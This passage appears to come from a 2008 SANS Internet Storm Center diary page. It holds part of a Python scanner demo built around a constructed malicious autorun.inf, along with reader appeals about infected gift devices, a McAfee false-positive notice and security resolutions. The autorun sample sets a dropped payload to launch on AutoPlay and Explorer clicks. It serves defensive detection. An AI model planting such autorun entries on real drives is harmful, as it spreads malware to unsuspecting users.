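# Constructed sample, modelled on the autorun.inf worms discussed above;
# the payload names are invented for this demonstration.
SAMPLE_AUTORUN = """\
[AutoRun]
; launch the dropped payload on AutoPlay, and again if the user
; double-clicks or right-clicks the drive in Explorer
open=system.com
shellexecute=update.exe
shell\\open\\command=system.com
shell\\explore\\command=system.com
icon=%SystemRoot%\\system32\\shell32.dll,4
label=Photos
"""


def demo():
    """Build a throw-away 'volume' holding the sample autorun.inf and one
    of its payloads, scan it, and return the findings."""
    root = tempfile.mkdtemp(prefix="volume_")
    try:
        with open(os.path.join(root, "autorun.inf"), "w") as fh:
            fh.write(SAMPLE_AUTORUN)
        with open(os.path.join(root, "system.com"), "wb") as fh:
            fh.write(b"\xcc")      # placeholder bytes, not a real payload
        return scan_volume(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for directive, target, present in demo():
        state = "present" if present else "MISSING on volume"
        print(f"{directive:<22} -> {target:<12} [{state}]")
```

Run against a real drive letter or mount point (`scan_volume("E:\\")`) before opening it in Explorer. On Windows the hands-on equivalent of what the third reader did is `dir /a:h E:\` to list the hidden files and `attrib -s -h E:\autorun.inf` to make the file visible and deletable; a launch target that is reported missing is a hint that the payload was dropped with hidden/system attributes or under a directory named to look like a system folder.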

By the way, I also received a digital photo frame for Christmas but have not had any problems with it other than the resolution totally sucks.  But that's a subject of another diary some day.  The GPS unit I bought in November mounts as a drive letter in Windows but it too had no malware on it.  We are pretty certain that this is not a wide-spread problem but we need to know if others have experienced anything like this.  Please use our contact form to report any observed malware-like behavior in any of these external devices you recently purchased or received as gifts.  Please be sure to include information about the model name, where you bought it, and if you've been in contact with the store or product vendor.  We'll provide a summary in a few days with details on what was reported.

Many thanks to readers Edd, Larry, and Rick for bringing this issue to our attention.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-01-03

What's on your to-do list?

It's the time of the year that everyone (ok, some people) look forward to the fresh start the new year brings and have hope for the projects they want to accomplish during the year.

If you have any big projects coming up that are somehow unique or at least have a different twist, drop us a line and I'll publish the ones that seem interesting.

-Christopher Carboni

Handler On Duty



Published: 2008-01-02

McAfee falsing on some JavaScripts

Some users reported that their AV was detecting JS/Exploit-BO virus, on sites like ESPN and Friendster, for instance.

The problem is with the McAfee AV.

McAfee has just released an emergency DAT to fix the false positive: DAT file 5197, released today, was detecting some JavaScripts as JS/Exploit-BO.

The new DAT is 5198, and the URL to download it is:


Pedro Bueno (pbueno //&& // isc. sans. org )


Published: 2008-01-01

New Year ...................New "Security" Resolutions

Every year do you keep promising to lose weight, quit smoking and save more money? And every year do you break your resolutions by January 15th? Well this year let’s resolve to make some changes that really count. Let’s make our networks and computers more secure. We’re making a list and checking it twice. Here is my list of things to make sure to do in 2008:

  1. Make sure every computer is patched to the latest operating system update.
  2. Make sure every computer is running updated anti-virus programs.
  3. Check your systems for spyware regularly.
  4. Institute a Security Awareness Program and keep it updated and lively.
  5. Attend at least one Security Training event this year, online or in person.
  6. Make your homepage count, set it to SANS Internet Storm Center to keep up with the latest security issues.

Send your suggestions here.

Fair Winds in 2008,